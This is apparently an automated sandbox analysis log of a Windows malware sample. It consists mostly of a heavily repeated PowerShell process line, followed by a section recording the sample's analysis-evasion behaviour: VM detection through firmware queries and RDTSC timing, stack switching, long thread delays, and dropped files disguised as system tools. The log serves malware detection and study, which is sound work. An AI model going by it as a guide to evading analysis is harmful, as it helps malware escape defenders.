                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Query firmware table information (likely to detect VMs)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeAPI/Special instruction interceptor: Address: 568EE8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeAPI/Special instruction interceptor: Address: 556BCB
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeAPI/Special instruction interceptor: Address: 591361
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeAPI/Special instruction interceptor: Address: 67CAB8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeAPI/Special instruction interceptor: Address: 58FA69
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeAPI/Special instruction interceptor: Address: 67E513
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeAPI/Special instruction interceptor: Address: 552C88
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeAPI/Special instruction interceptor: Address: 56F297
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeAPI/Special instruction interceptor: Address: 56043A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeAPI/Special instruction interceptor: Address: 6542B5
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeAPI/Special instruction interceptor: Address: 7FF9105CE814
                    Tries to evade analysis by execution special instruction (VM detection)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exeSpecial instruction interceptor: First address: 64C48F instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeSpecial instruction interceptor: First address: 140422224 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeSpecial instruction interceptor: First address: 1402AC77B instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                    Source: C:\Windows\System32\svchost.exeCode function: 4_2_000001C3DDDBDE00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,4_2_000001C3DDDBDE00
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6098Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3681Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7171Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2462Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5622Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2190Jump to behavior
